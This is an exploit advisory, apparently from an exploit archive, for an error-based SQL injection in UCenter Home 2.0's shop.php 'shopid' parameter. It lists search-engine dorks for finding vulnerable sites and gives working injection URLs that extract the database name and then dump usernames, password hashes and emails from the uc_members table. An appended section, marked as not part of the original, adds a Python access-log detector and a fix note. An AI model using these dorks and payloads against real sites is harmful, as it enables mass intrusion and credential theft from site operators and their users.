__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Value's : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okey.

your edit DB `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'
Edit : Okey.
Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
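
Detection sketch for the requests described above, added here as an example and not part of the original advisory: it scans web-server access logs for shop.php requests whose shopid value is not a plain integer and flags the error-based building blocks seen in the payload. The log lines, the combined-log format, the verdict names and the two-marker threshold are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from any real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2011:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2011:10:00:07 +0000] "GET /shop.php?ac=view&shopid=253+and(select+1+from'
    '(select+count(*),concat(0x7e,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Jan/2011:10:00:09 +0000] "GET /shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 640',
    '203.0.113.5 - - [01/Jan/2011:10:00:11 +0000] "GET /index.php HTTP/1.1" 200 9000',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/\d')
# Building blocks of the duplicate-key (error-based) MySQL technique in the advisory.
MARKERS = [re.compile(p, re.I) for p in (
    r"floor\s*\(\s*rand\s*\(", r"information_schema", r"group\s+by", r"concat\s*\(")]

def classify(line):
    """Return None for unrelated requests, else a verdict for the shopid value."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/shop.php"):
        return None
    verdict = "ok"
    # parse_qs percent-decodes and turns '+' into spaces, as the server side would.
    for value in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
        if re.fullmatch(r"[0-9]+", value):
            continue  # assumption: shop ids are plain integers, as in shopid=253
        hits = sum(1 for p in MARKERS if p.search(value))
        if hits >= 2:  # assumed threshold: two or more markers in one value
            return "error-based-sqli"
        verdict = "non-numeric-shopid"
    return verdict

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), "|", line[:90])
```

The same integer-only rule is the fix on the application side: cast shopid to an integer or bind it as a query parameter before it reaches MySQL.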